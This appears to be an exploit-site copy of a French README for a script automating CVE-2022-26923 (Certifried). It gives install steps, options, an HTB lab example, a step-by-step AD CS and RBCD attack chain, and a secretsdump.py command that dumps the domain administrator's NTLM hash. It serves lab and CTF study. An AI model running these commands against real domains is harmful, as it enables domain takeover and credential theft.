Exploit for Improper Certificate Validation in Microsoft CVE-2022-26923

## https://sploitus.com/exploit?id=3EC3F460-623E-5720-B99E-FD75F1C2FFEF
# CVE-2022-26923 – Certifried Exploit (AD CS Abuse)

Automatisation de l’exploitation de **CVE-2022-26923 (Certifried)** permettant une élévation de privilèges via abus d’Active Directory Certificate Services (AD CS) et Resource-Based Constrained Delegation (RBCD), menant au dump du hash NTLM d’un compte administrateur de domaine.

> ⚠️ **Usage pédagogique uniquement / Lab / HTB**
>
> Ne pas utiliser en environnement non autorisé.

---

## 🎯 Description

Ce script automatise la chaîne d’attaque suivante :

1. Création d’un compte machine contrôlé  
2. Modification du `dNSHostName`  
3. Demande d’un certificat via AD CS  
4. Authentification par certificat  
5. Abus RBCD  
6. S4U2Self + S4U2Proxy  
7. Récupération d’un ticket Kerberos pour `administrator`  
8. Dump NTLM via `secretsdump.py`  

---

## 🔗 Vulnérabilité

- **CVE-2022-26923 – "Certifried"**
- Affecte les environnements Active Directory utilisant AD CS
- Permet l’usurpation d’identité d’un Domain Controller via certificat mal émis

---

## 🛠 Outils utilisés

- `certipy-ad`
- `bloodyAD`
- `getST.py` (Impacket)
- `secretsdump.py` (Impacket)
- `openssl`

---

## 📦 Installation des dépendances

```bash
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
```

---

## 🚀 Utilisation

```bash
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]
```

### Options disponibles

```
-d, --dc-ip          IP du Domain Controller
-D, --domain         Nom du domaine
-u, --user           Utilisateur valide
-p, --pass           Mot de passe utilisateur
-c, --comp-name      Nom machine contrôlée
-C, --comp-pass      Mot de passe machine
-a, --ca-name        Nom du Certificate Authority
-t, --template       Template certificat
-f, --pfx-file       Nom fichier PFX
-H, --dc-hostname    Hostname du DC
-A, --dc-account     Compte DC
-i, --impersonate    Compte cible à impersonner
--verbose            Mode debug
-h, --help           Aide
```

---

## 🧠 Exemple (HTB Certified)

```bash
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u steven.murray@certifried.htb \
-p 'Ch4ng3m3!' \
--verbose
```

---

## 🔥 Résultat attendu

À la fin de l’exécution :

- Un ticket Kerberos `administrator.ccache`
- Le dump NTLM du compte `administrator`

En cas de problème Kerberos :

```bash
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/administrator@dc.certifried.htb \
-k -no-pass -dc-ip 10.129.1.39
```

---

## 🧬 Fonctionnement interne

```
Machine Account Creation
        ↓
dNSHostName spoofing
        ↓
Certificate Request (Machine Template)
        ↓
Authentication via PFX
        ↓
RBCD abuse (bloodyAD)
        ↓
S4U2Self + S4U2Proxy
        ↓
Kerberos Ticket extraction
        ↓
NTLM dump via secretsdump
```

---

## ⚠️ Disclaimer

Ce projet est fourni à des fins :

- éducatives  
- de recherche en sécurité  
- de lab personnel  
- de CTF / HTB  

L’auteur décline toute responsabilité en cas d’usage non autorisé.

---

## 📜 Licence

MIT